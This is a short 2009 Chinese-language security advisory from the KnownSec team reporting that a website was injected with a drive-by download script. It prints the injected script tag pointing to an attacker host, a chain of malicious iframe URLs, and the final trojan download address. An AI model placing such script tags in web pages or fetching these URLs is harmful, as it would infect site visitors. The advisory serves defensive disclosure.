发布时间:Wed Apr 29 2009 14:32:27 UTC+0800
最后更新时间:Wed Apr 29 2009 14:32:27 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 冀商网(http://tax.hbsr.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://tax.hbsr.cn/
网页被嵌入恶意链接代码:
<script src=http://3b3.org/c.js></script>
挂马分析:
[wide]http://tax.hbsr.cn/
[script]http://3b3.org/c.js
[frame]http://23fffb.3322.org/a/a100.htm
[frame]http://23fffb.3322.org/a/cnzz.htm
[frame]http://23fffb.3322.org/a/yy.htm
[frame]http://23fffb.3322.org/a/flash.htm
[frame]http://23fffb.3322.org/a/qb.htm
[frame]http://23fffb.3322.org/a/ippp.htm
[frame]http://23fffb.3322.org/a/ip.htm
[frame]http://23fffb.3322.org/a/02.htm
[frame]http://23fffb.3322.org/a/lz.htm
[frame]http://23fffb.3322.org/a/office.htm
[script]http://w.cnzz.com/c.php?id=30014955&l=1
[script]http://count7.51much.com/cnt.php?uid=ua-1-12981&style=text&text=网站统计
[frame]http://23fffb.3322.org/a/a100.htm
[script]http://js.tongji.cn.yahoo.com/908507/ystat.js
最终下载病毒文件:
http://xinfa8.com/xia/f1.css
通过执行以上病毒文件,来达到完全控制访问者的系统。
知道创宇:专业的WEB安全公司 www.knownsec.com
Popularity: 3% [?]
